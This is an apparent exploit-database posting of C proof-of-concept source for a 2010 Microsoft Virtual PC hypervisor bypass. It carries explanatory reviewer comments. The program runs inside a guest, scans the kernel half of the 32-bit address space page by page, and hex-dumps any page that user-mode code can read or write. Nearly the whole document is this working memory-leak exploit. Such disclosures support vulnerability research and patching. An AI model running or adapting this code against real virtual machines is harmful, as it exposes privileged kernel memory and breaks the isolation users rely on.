Microsoft Virtual PC Hypervisor Virtual Machine Bypass Vulnerability
Posted on 17 March 2010
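/*
 * =====================================================================================
 * Microsoft Virtual PC Hypervisor Virtual Machine Monitor Security Bypass Vulnerability
 * =====================================================================================
 *
 * Vulnerable:
 *   Microsoft Windows Virtual PC 0
 *   Microsoft Windows 7 XP Mode 0
 *   Microsoft Virtual Server 2005 0
 *   Microsoft Virtual PC 2007 SP1
 *   Microsoft Virtual PC 2007 0
 *
 * Reading the output (reviewer note): the program runs as an ordinary
 * user-mode process inside the guest and probes every 4 KiB page from
 * 0x80000000 up to 0xfffff000. With the default 32-bit Windows address-space
 * split that range belongs to the kernel, so on a system that enforces the
 * split every probe is expected to fail and no page is printed. Any page that
 * is printed is one the guest's user-mode code could read or write, which is
 * the boundary failure the advisory title describes.
 *
 * The address constants and the pointer-to-unsigned-int casts assume a
 * 32-bit build.
 */

#include <windows.h>
#include <stdio.h>
#include <ctype.h>
#include <string.h> /* memcpy; the original relied on windows.h pulling it in */

#define ROWS 16 /* bytes shown per hex-dump row */

void find_leaked_memory ( void );
void print_data ( unsigned int , char * , unsigned int );

/*
 * Prints the banner, then runs the page scan.
 * The exit status is 1 unconditionally, as in the original listing.
 */
int main ( void )
{
    /* Banner. The listing had lost the backslash of every "\n" escape. */
    printf ( "\n*********** vpdumper.exe ***********" );
    printf ( "\nCreated by Nicolas A. Economou ( neconomou@corest.com )" );
    printf ( "\nCore Security Technologies, Buenos Aires, Argentina ( 2010 )\n" );

    /* Search for and print the accessible pages */
    printf ( "\nsearching leaked memory\n" );
    find_leaked_memory ();

    return ( 1 );
}

/*
 * Walks the upper half of the 32-bit address space one page (0x1000 bytes)
 * at a time. For each page it asks IsBadReadPtr / IsBadWritePtr whether the
 * first byte is accessible; when either probe succeeds it copies the page
 * into a local buffer, prints which accesses succeeded ("R", "W" or "RW")
 * and hex-dumps the page with print_data().
 *
 * NOTE(review): IsBadReadPtr and IsBadWritePtr are documented by Microsoft
 * as obsolete; they are kept because the probe result is the whole point of
 * the demonstration.
 */
void find_leaked_memory ( void )
{
    char buffer [ 0x1000 ];
    char *base;
    int r, w;

    /* Scan the high address range, one page per iteration */
    for ( base = ( char * ) 0x80000000 ; base < ( char * ) 0xfffff000 ; base += 0x1000 )
    {
        /*
         * "Dark Area": the author skips this single page. The listing gives
         * no reason beyond that label.
         */
        if ( ( unsigned int ) base == 0xe839c000 )
        {
            continue;
        }

        /* Reset the per-page flags */
        r = FALSE;
        w = FALSE;

        /* Readable? */
        if ( IsBadReadPtr ( base , 1 ) == FALSE )
        {
            r = TRUE;
        }

        /* Writable? */
        if ( IsBadWritePtr ( base , 1 ) == FALSE )
        {
            w = TRUE;
        }

        /* Report the page if either probe succeeded */
        if ( r == TRUE || w == TRUE )
        {
            /*
             * Copy the whole page. Only the first byte was probed, and the
             * copy also runs when just the write probe succeeded, so this
             * read is not covered by the checks above.
             */
            memcpy ( buffer , base , 0x1000 );

            /* Page attributes */
            printf ( "attributes: " );
            printf ( "%s" , ( r == TRUE ) ? "R":"" );
            printf ( "%s" , ( w == TRUE ) ? "W":"" );
            printf ( "\n" );

            /* Page contents */
            print_data ( ( unsigned int ) base , buffer , 0x1000 );
        }
    }
}

/*
 * Hex-dumps a buffer, ROWS bytes per line, as
 *     address | hex bytes | printable characters
 *
 * direccion         address printed for the first byte; advanced by ROWS
 *                   after each line
 * buffer            bytes to dump
 * bytes_a_imprimir  number of bytes of buffer to print
 */
void print_data ( unsigned int direccion , char *buffer , unsigned int bytes_a_imprimir )
{
    unsigned int cont;
    unsigned int i;

    /* One output line per ROWS bytes */
    for ( cont = 0 ; cont < bytes_a_imprimir ; cont = cont + ROWS )
    {
        /* Address column */
        printf ( "%.8x | " , direccion );

        /* Advance the address shown on the next line */
        direccion = direccion + ROWS;

        /* Hex column */
        for ( i = 0 ; i < ROWS ; i ++ )
        {
            /* Print only the bytes that were requested */
            if ( i < ( bytes_a_imprimir - cont ) )
            {
                printf ( "%.2x " , ( unsigned char ) buffer [ i + cont ] );
            }
            else
            {
                /* Pad a short last row to the width of one "%.2x " cell */
                printf ( "   " );
            }
        }

        /* Separator between the two columns */
        printf ( "| " );

        /* Character column */
        for ( i = 0 ; i < ROWS ; i ++ )
        {
            if ( i < ( bytes_a_imprimir - cont ) )
            {
                /*
                 * isgraph() needs a value representable as unsigned char;
                 * passing a negative plain char is undefined behaviour.
                 */
                unsigned char c = ( unsigned char ) buffer [ i + cont ];

                printf ( "%c" , isgraph ( c ) ? c : '.' );
            }
            else
            {
                printf ( " " );
            }
        }

        /* End of line */
        printf ( "\n" );
    }
}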